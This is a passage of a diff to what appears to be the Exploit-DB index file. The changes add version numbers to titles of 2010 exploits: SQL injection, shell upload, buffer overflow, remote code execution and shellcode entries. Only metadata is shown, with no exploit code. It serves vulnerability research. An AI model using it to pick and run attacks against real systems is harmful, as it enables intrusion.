in Iomega Home Media Network Hard Drive 2.038 - 2.061",2010-04-16,fizix610,hardware,remote,0 +12265,platforms/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 - 2.061 - Unauthenticated File-system Access",2010-04-16,fizix610,hardware,remote,0 12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - CSRF Change Username & Password Exploit",2010-04-16,EL-KAHINA,php,webapps,0 12267,platforms/php/webapps/12267.txt,"WebAdmin Shell Upload Vulnerability",2010-04-16,DigitALL,php,webapps,0 12268,platforms/php/webapps/12268.txt,"Uploader 0.7 Shell Upload Vulnerability",2010-04-16,DigitALL,php,webapps,0 @@ -11221,13 +11221,13 @@ id,file,description,date,author,platform,type,port 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 -12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK SQL injection vulnerability",2010-04-19,kaMtiEz,php,webapps,0 +12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK 1.0.5 - SQL injection vulnerability",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12302,platforms/windows/dos/12302.html,"HP Operations Manager <= 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection Exploit",2010-04-20,Ctacok,php,webapps,0 12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,chr1x,multiple,remote,0 12305,platforms/php/webapps/12305.txt,"Joomla com_jnewspaper (cid) SQL Injection Vulnerability",2010-04-20,"Don Tukulesto",php,webapps,0 -12306,platforms/php/webapps/12306.txt,"Joomla Component JTM Reseller SQL injection vulnerability",2010-04-20,kaMtiEz,php,webapps,0 +12306,platforms/php/webapps/12306.txt,"Joomla Component JTM Reseller 1.9 Beta SQL Injection Vulnerability",2010-04-20,kaMtiEz,php,webapps,0 12308,platforms/windows/remote/12308.txt,"MultiThreaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversal Exploits",2010-04-20,Dr_IDE,windows,remote,0 12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal Exploit",2010-04-20,Dr_IDE,windows,remote,0 @@ -11244,12 +11244,12 @@ id,file,description,date,author,platform,type,port 12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Stored XSS",2010-04-21,ITSecTeam,php,webapps,0 12324,platforms/multiple/dos/12324.py,"Multiple Browsers Audio Tag DoS Vulnerability",2010-04-21,"Chase Higgins",multiple,dos,0 12325,platforms/php/webapps/12325.txt,"Joomla Component com_portfolio Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 -12326,platforms/windows/local/12326.py,"ZipGenius zgtips.dll Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 +12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - zgtips.dll Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent XSS Vulnerability",2010-04-21,7Safe,asp,webapps,0 12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple XSS",2010-04-21,"Lucas Apa",php,webapps,0 12331,platforms/windows/remote/12331.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0 12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 PWD Remote Exploit",2010-04-22,zombiefx,windows,remote,0 -12333,platforms/php/webapps/12333.txt,"cms - (id) SQL Injection Vulnerability",2010-04-22,spykit,php,webapps,0 +12333,platforms/php/webapps/12333.txt,"cms - (id) 5.0 - SQL Injection Vulnerability",2010-04-22,spykit,php,webapps,0 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote DoS",2010-04-22,Andi,linux,dos,0 12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 @@ -11279,7 +11279,7 @@ id,file,description,date,author,platform,type,port 12367,platforms/windows/remote/12367.html,"HP Digital Imaging (hpodio08.dll) Insecure Method Exploit",2010-04-24,"ThE g0bL!N",windows,remote,0 12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 (.zip) SEH 0day exploit",2010-04-24,"TecR0c and Sud0",windows,local,0 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability",2010-04-24,eidelweiss,php,webapps,0 -12370,platforms/php/webapps/12370.txt,"XSS and Authentication bypass in NCT Jobs Portal Script",2010-04-24,Sid3^effects,php,webapps,0 +12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - XSS and Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 (que_id) SQL Injection Vulnerability",2010-04-24,v3n0m,php,webapps,0 12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - XSS Vulnerabilities",2010-04-24,Valentin,php,webapps,0 @@ -11310,7 +11310,7 @@ id,file,description,date,author,platform,type,port 12407,platforms/php/webapps/12407.txt,"CMScout 2.08 SQL Injection Vulnerability",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload SQL Injection Vulnerability",2010-04-26,BILGE_KAGAN,php,webapps,0 -12411,platforms/php/webapps/12411.txt,"Authentication bypass in FreeRealty(Free Real Estate Listing Software)",2010-04-27,Sid3^effects,php,webapps,0 +12411,platforms/php/webapps/12411.txt,"FreeRealty(Free Real Estate Listing Software) - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12412,platforms/php/webapps/12412.txt,"Ramaas Software CMS SQL Injection Vulnerability",2010-04-27,41.w4r10r,php,webapps,0 12413,platforms/php/webapps/12413.txt,"i-Net Online Community XSS and Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12414,platforms/php/webapps/12414.txt,"2daybiz Auction Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 @@ -11334,7 +11334,7 @@ id,file,description,date,author,platform,type,port 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump RCE exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump LFI exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix <= 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 -12436,platforms/php/webapps/12436.txt,"Pligg CMS (story.php?id) SQL Injection Vulnerability",2010-04-28,"Don Tukulesto",php,webapps,0 +12436,platforms/php/webapps/12436.txt,"Pligg CMS (story.php?id) 1.0.4 - SQL Injection Vulnerability",2010-04-28,"Don Tukulesto",php,webapps,0 12437,platforms/windows/dos/12437.html,"Safari 4.0.3 & 4.0.4 Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 @@ -11494,17 +11494,17 @@ id,file,description,date,author,platform,type,port 12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection Vulnerability",2010-05-14,CoBRa_21,php,webapps,0 12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability",2010-05-14,GuN,php,webapps,0 12610,platforms/multiple/webapps/12610.txt,"VMware View Portal <= 3.1 XSS vulnerability",2010-05-14,"Alexey Sintsov",multiple,webapps,0 -12611,platforms/php/webapps/12611.txt,"Joomla Component MS Comment LFI Vulnerability",2010-05-15,Xr0b0t,php,webapps,0 +12611,platforms/php/webapps/12611.txt,"Joomla Component MS Comment 0.8.0b - LFI Vulnerability",2010-05-15,Xr0b0t,php,webapps,0 12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability",2010-05-15,CoBRa_21,php,webapps,0 12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 (tiny_mce) Remote File Upload",2010-05-15,ITSecTeam,php,webapps,0 12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 - parent.close() Memory Corruption exploit (ASLR and DEP bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 12615,platforms/php/webapps/12615.txt,"Joomla Component com_camp SQL Injection Vulnerability",2010-05-15,"Kernel Security Group",php,webapps,0 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 -12618,platforms/php/webapps/12618.txt,"Joomla Component simpledownload LFI Vulnerability",2010-05-16,Xr0b0t,php,webapps,0 +12618,platforms/php/webapps/12618.txt,"Joomla Component simpledownload 0.9.5 - LFI Vulnerability",2010-05-16,Xr0b0t,php,webapps,0 12619,platforms/php/webapps/12619.txt,"Cybertek CMS Local File Include Vulnerability",2010-05-16,XroGuE,php,webapps,0 12620,platforms/php/webapps/12620.txt,"The iceberg 'Content Management System' SQL Injection Vulnerability",2010-05-16,cyberlog,php,webapps,0 12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - (.zip) 0day Stack Buffer Overflow PoC exploit",2010-05-16,sud0,windows,local,0 -12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 +12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 12624,platforms/php/webapps/12624.txt,"LinPHA <= 1.3.2 - (rotate.php) Remote Command Execution Vulnerability",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - (fckeditor) Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 @@ -11530,11 +11530,11 @@ id,file,description,date,author,platform,type,port 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability",2010-05-18,"vir0e5 ",php,webapps,0 12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 and below Hack GENOCIDE Environment overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 and below Hack PATH Environment overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 -12654,platforms/php/webapps/12654.txt,"DB[CMS] SQL Injection Vulnerability",2010-05-18,Pokeng,php,webapps,0 +12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection Vulnerability",2010-05-18,Pokeng,php,webapps,0 12655,platforms/windows/dos/12655.txt,"QtWeb Browser 3.3 - DoS",2010-05-18,PoisonCode,windows,dos,0 12656,platforms/php/webapps/12656.txt,"Battle Scrypt Shell Upload Vulnerability",2010-05-19,DigitALL,php,webapps,0 -12657,platforms/windows/remote/12657.txt,"Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)",2010-05-19,"Jordi Chancel",windows,remote,0 -12658,platforms/freebsd/webapps/12658.txt,"Web Administration Broken Access Control in McAfee Email Gateway",2010-05-19,"Nahuel Grisolia",freebsd,webapps,0 +12657,platforms/windows/remote/12657.txt,"Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)",2010-05-19,"Jordi Chancel",windows,remote,0 +12658,platforms/freebsd/webapps/12658.txt,"McAfee Email Gateway - Web Administration Broken Access Control",2010-05-19,"Nahuel Grisolia",freebsd,webapps,0 12659,platforms/php/webapps/12659.txt,"DB[CMS] (section.php) SQL Injection Vulnerability",2010-05-19,CoBRa_21,php,webapps,0 12660,platforms/hardware/webapps/12660.txt,"Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)",2010-05-19,"Jeromie Jackson",hardware,webapps,0 12661,platforms/php/webapps/12661.txt,"DBCart (article.php) SQL Injection Vulnerability",2010-05-19,v3n0m,php,webapps,0 @@ -11555,7 +11555,7 @@ id,file,description,date,author,platform,type,port 12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 TFTP DoS",2010-05-21,Nullthreat,windows,dos,69 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection Vulnerability",2010-05-21,Gamoscu,php,webapps,0 12686,platforms/php/webapps/12686.txt,"Online University (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0 -12687,platforms/windows/dos/12687.pl,"WinDirectAudio (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0 +12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCms 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0 @@ -11623,7 +11623,7 @@ id,file,description,date,author,platform,type,port 12766,platforms/php/webapps/12766.txt,"PPhlogger <= 2.2.5 - (trace.php) Remote Command Execution Vulnerability",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 12767,platforms/php/webapps/12767.txt,"parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection Vulnerability",2010-05-27,Mr.P3rfekT,php,webapps,0 -12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA LFI vulnerability",2010-05-27,kaMtiEz,php,webapps,0 +12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI Vulnerability",2010-05-27,kaMtiEz,php,webapps,0 12770,platforms/php/webapps/12770.txt,"toronja cms SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 12771,platforms/php/webapps/12771.txt,"Toronja Cms HTML/XSS Injection Vulnerability",2010-05-27,CoBRa_21,php,webapps,0 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 @@ -11637,7 +11637,7 @@ id,file,description,date,author,platform,type,port 12781,platforms/php/webapps/12781.txt,"Joomla Component com_jepoll (pollid) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 12782,platforms/php/webapps/12782.txt,"Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0 -12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability",2010-05-29,Shamus,windows,webapps,0 +12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - Remote SQL Injection Vulnerability",2010-05-29,Shamus,windows,webapps,0 12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery RFI & SQLi Vulnerability",2010-05-29,AntiSecurity,php,webapps,0 12788,platforms/php/webapps/12788.txt,"Marketing Web Design Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter Remote File Inclusion Vulnerability",2010-05-29,AntiSecurity,php,webapps,0 @@ -11646,7 +11646,7 @@ id,file,description,date,author,platform,type,port 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions cms SQL Injection Vulnerability",2010-05-29,cyberlog,php,webapps,0 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions cms SQL Injection Vulnerability (id= / page=)",2010-05-29,gendenk,php,webapps,0 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz SQL Injection Exploit",2010-05-29,"Valentin Hoebel",php,webapps,0 -12797,platforms/php/webapps/12797.txt,"Webiz - Local Shell Upload Vulnerability",2010-05-29,kannibal615,php,webapps,0 +12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local Shell Upload Vulnerability",2010-05-29,kannibal615,php,webapps,0 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection Vulnerability",2010-05-29,kannibal615,php,webapps,0 12801,platforms/php/webapps/12801.txt,"Oscommerce Online Merchant 2.2 - File Disclosure And Admin ByPass",2010-05-30,Flyff666,php,webapps,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 @@ -12087,7 +12087,7 @@ id,file,description,date,author,platform,type,port 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS SQL Injection Vulnerability",2010-06-07,Pokeng,php,webapps,0 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM",2010-06-07,sud0,windows,local,0 -13766,platforms/php/webapps/13766.txt,"Authentication Bypass in Home of MCLogin System",2010-06-08,"L0rd CrusAd3r",php,webapps,0 +13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit",2010-06-08,mr_me,windows,local,0 13768,platforms/php/local/13768.py,"Castripper 2.50.70 - (.pls) stack buffer overflow DEP bypass exploit",2010-06-08,mr_me,php,local,0 13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQLI Vulnerability",2010-06-08,Sid3^effects,php,webapps,0 @@ -12119,7 +12119,7 @@ id,file,description,date,author,platform,type,port 13798,platforms/php/webapps/13798.txt,"joomla com_jcommunity SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13799,platforms/php/webapps/13799.txt,"joomla com_jmarket SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13800,platforms/php/webapps/13800.txt,"joomla com_jsubscription SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 -13801,platforms/php/webapps/13801.txt,"Science Fair In A Box SQLi & XSS Vulnerability",2010-06-09,"L0rd CrusAd3r",php,webapps,0 +13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQLi & XSS Vulnerability",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script SQLi Vulnerability",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13803,platforms/php/webapps/13803.txt,"PHPAccess SQLi Vulnerability",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13804,platforms/php/webapps/13804.txt,"joomla com_jnewsletter SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 @@ -12239,7 +12239,7 @@ id,file,description,date,author,platform,type,port 13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection Vulnerability (ladder[id])",2010-06-19,ahwak2000,php,webapps,0 13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection Vulnerability",2010-06-19,ahwak2000,php,webapps,0 13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 CSRF Proof of Concept",2010-06-19,"Luis Santana",php,webapps,0 -13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor buffer overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 +13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow Exploit (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp (.maf) local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user with password - 390 bytes",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 @@ -12276,7 +12276,7 @@ id,file,description,date,author,platform,type,port 13980,platforms/php/webapps/13980.txt,"Cornerstone CMS SQL Injection Vulnerability",2010-06-22,"Th3 RDX",php,webapps,0 13981,platforms/php/webapps/13981.txt,"Joomla Component Picasa2Gallery LFI vulnerability",2010-06-22,kaMtiEz,php,webapps,0 13982,platforms/php/webapps/13982.txt,"Alpin CMS SQL Injection Vulnerability (e4700.asp?id)",2010-06-22,CoBRa_21,php,webapps,0 -13983,platforms/php/webapps/13983.txt,"Greeting card SQL Injection Vulnerability",2010-06-22,Net.Edit0r,php,webapps,0 +13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection Vulnerability",2010-06-22,Net.Edit0r,php,webapps,0 13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script Blind SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 13987,platforms/php/webapps/13987.txt,"Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 13988,platforms/php/webapps/13988.txt,"PHP Event Calendar <= 1.5 - Multiple Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0 @@ -12363,9 +12363,9 @@ id,file,description,date,author,platform,type,port 14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 Stack buffer overflow",2010-06-28,"fl0 fl0w",windows,local,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 -14096,platforms/php/webapps/14096.html,"CMSQlite & CMySQLite CSRF Vulnerability",2010-06-28,"ADEO Security",php,webapps,0 +14096,platforms/php/webapps/14096.html,"CMSQlite & CMySQLite 1.3 - CSRF Vulnerability",2010-06-28,"ADEO Security",php,webapps,0 14097,platforms/linux/shellcode/14097.c,"Linux/ARM - execve(""/bin/sh"",""/bin/sh"",0) - 30 bytes",2010-06-28,"Jonathan Salwan",linux,shellcode,0 -14098,platforms/windows/local/14098.py,"GSM SIM Utility sms file Local SEH BoF",2010-06-28,chap0,windows,local,0 +14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local SEH BoF",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb Multiple Remote Dos",2010-06-28,Markot,windows,dos,80 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload Vulnerability",2010-06-28,Battousai,multiple,webapps,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - (.avi) Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 @@ -12442,7 +12442,7 @@ id,file,description,date,author,platform,type,port 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,blake,windows,remote,0 14196,platforms/php/webapps/14196.txt,"Joomla SocialAds Component com_socialads Persistent XSS Vulnerability",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injection Vulnerability",2010-07-03,"Salvatore Fresta",php,webapps,0 -14198,platforms/php/webapps/14198.txt,"Simple:Press Wordpress Plugin SQL Injection Vulnerability",2010-07-04,"ADEO Security",php,webapps,0 +14198,platforms/php/webapps/14198.txt,"Simple:Press Wordpress Plugin 4.3.0 - SQL Injection Vulnerability",2010-07-04,"ADEO Security",php,webapps,0 14199,platforms/php/webapps/14199.txt,"phpaaCms 0.3.1 - (show.php?id=) SQL Injection Vulnerability",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow Exploit",2010-07-04,blake,windows,remote,0 14201,platforms/php/webapps/14201.txt,"phpaaCms (list.php?id) SQL Injection Vulnerability",2010-07-04,CoBRa_21,php,webapps,0 @@ -12496,8 +12496,8 @@ id,file,description,date,author,platform,type,port 14254,platforms/osx/remote/14254.py,"EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 14256,platforms/windows/local/14256.txt,"HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 -14257,platforms/windows/remote/14257.py,"Hero DVD Remote Buffer Overflow Exploit",2010-07-07,chap0,windows,remote,0 -14258,platforms/windows/local/14258.py,"GSM SIM Utility Local Exploit Direct Ret ver.",2010-07-07,chap0,windows,local,0 +14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow Exploit",2010-07-07,chap0,windows,remote,0 +14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver.",2010-07-07,chap0,windows,local,0 14259,platforms/php/webapps/14259.txt,"SQL Injection Vulnerabilities Green Shop",2010-07-07,PrinceofHacking,php,webapps,0 14260,platforms/php/webapps/14260.txt,"Sijio Community Software SQL Injection/Persistent XSS Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 14261,platforms/arm/shellcode/14261.c,"ARM Polymorphic execve(""/bin/sh"", [""/bin/sh""], NULL) Shellcode Generator",2010-07-07,"Jonathan Salwan",arm,shellcode,0 @@ -12589,7 +12589,7 @@ id,file,description,date,author,platform,type,port 14366,platforms/php/webapps/14366.txt,"Whizzy CMS <= 10.01 - Local File Inclusion Vulnerability",2010-07-15,"Anarchy Angel",php,webapps,0 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 14368,platforms/php/webapps/14368.txt,"RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability",2010-07-15,"Salvatore Fresta",php,webapps,0 -14369,platforms/jsp/webapps/14369.txt,"ORACLE BPM Process Administrator (XSS)",2010-07-15,Markot,jsp,webapps,0 +14369,platforms/jsp/webapps/14369.txt,"ORACLE Business Process Management (Process Administrator) 5.7-6.0-10.3 - XSS",2010-07-15,Markot,jsp,webapps,0 14370,platforms/php/webapps/14370.txt,"BS Scripts Directory (info.php) SQL Injection Vulnerability",2010-07-15,D4rk357,php,webapps,0 14371,platforms/php/webapps/14371.txt,"BS Scripts Directory (articlesdetails.php) SQL Injection Vulnerability",2010-07-16,k4k4shi,php,webapps,0 14372,platforms/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow",2010-07-16,shinnai,windows,dos,0 @@ -12661,7 +12661,7 @@ id,file,description,date,author,platform,type,port 14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload Vulnerability",2010-07-23,SONIC,php,webapps,0 14446,platforms/php/webapps/14446.txt,"PhotoPost PHP SQL Injection Vulnerability",2010-07-23,Cyber-sec,php,webapps,0 14447,platforms/windows/remote/14447.html,"Multiple Web Browser Clickjacking Vulnerability (FF3.6.7/SM 2.0.6)",2010-07-23,"Pouya Daneshmand",windows,remote,0 -14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) SQL Injection Vulnerability",2010-07-23,Valentin,php,webapps,0 +14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (beta) & 1 (beta) - SQL Injection Vulnerability",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) SQL Injection Vulnerability",2010-07-23,Amine_92,php,webapps,0 14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote BoF Exploit (Post Auth) - (meta)",2010-07-23,"Muhamad 